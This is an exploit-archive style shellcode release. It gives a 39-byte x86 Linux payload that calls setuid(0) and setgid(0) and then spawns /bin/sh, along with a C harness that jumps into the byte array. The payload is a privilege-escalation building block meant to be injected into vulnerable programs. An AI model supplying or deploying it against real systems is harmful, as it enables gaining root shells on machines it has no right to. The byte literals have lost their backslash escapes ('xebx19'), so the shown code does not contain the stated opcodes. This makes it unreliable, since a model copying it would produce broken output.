# Title : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
# Published : 2010-06-01
# Author : gunslinger_
/*
Name : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
Date : Tue Jun 1 21:29:10 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>
#include <string.h>
char *shellcode=
"xebx19" /* jmp 0x804807b */
"x31xc0" /* xor %eax,%eax */
"xb0x17" /* mov $0x17,%al */
"x31xdb" /* xor %ebx,%ebx */
"xcdx80" /* int $0x80 */
"x31xc0" /* xor %eax,%eax */
"xb0x2e" /* mov $0x2e,%al */
"x31xdb" /* xor %ebx,%ebx */
"xcdx80" /* int $0x80 */
"x31xc0" /* xor %eax,%eax */
"xb0x0b" /* mov $0xb,%al */
"x5b" /* pop %ebx */
"x89xd1" /* mov %edx,%ecx */
"xcdx80" /* int $0x80 */
"xe8xe2xffxffxff" /* call 0x8048062 */
"x2f" /* das */
"x62x69x6e" /* bound %ebp,0x6e(%ecx) */
"x2f" /* das */
"x73x68" /* jae 0x80480ef */
"";
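/*
 * Test harness: prints the length of the payload literal, then transfers
 * control to it by calling the data pointer as a function.
 *
 * The cast from an object pointer to a function pointer is not defined by
 * ISO C. The literal is ordinary program data, so on systems that map such
 * data into non-executable pages the call faults instead of running the bytes.
 * That fault is the data-execution protection doing its job.
 *
 * The printed length matches the payload size only when the literal holds the
 * raw opcode bytes and none of them is 0x00, because strlen() stops at the
 * first NUL.
 */
int main(void)
{
	/* strlen() returns size_t, so the conversion is %zu; the original
	 * passed it to %d and called strlen() without <string.h>. */
	fprintf(stdout, "Length: %zu\n", strlen(shellcode));

	/* Jump into the byte array; control does not return here if the
	 * payload's execve succeeds. */
	((void (*)(void)) shellcode)();
	return 0;
}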